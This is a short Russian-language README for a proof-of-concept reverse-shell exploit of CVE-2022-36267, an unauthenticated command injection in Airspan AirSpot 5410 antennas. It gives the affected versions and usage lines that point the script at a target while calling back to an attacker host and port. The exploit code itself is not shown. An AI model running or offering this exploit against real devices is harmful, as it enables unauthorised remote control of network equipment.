
PoC-скрипт для CVE-2022-36267: Эксплуатирует уязвимость удаленного внедрения команд без аутентификации в антенне Airspan AirSpot 5410.
Этот репозиторий содержит сценарий обратной оболочки (Proof of Concept, PoC) для эксплуатации CVE-2022-36267 — критической уязвимости в устройствах Airspan AirSpot 5410. Скрипт является практической демонстрацией, дополняющей углубленный анализ, приведенный в блоге "Airspan AirSpot 5410 - Отчет об уязвимости".
Все устройства Airspan AirSpot 5410 версии 0.3.4.1-4 и ниже.
# Usage: python AirSpot-5410.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python AirSpot-5410.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

ТОЛЬКО В ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ.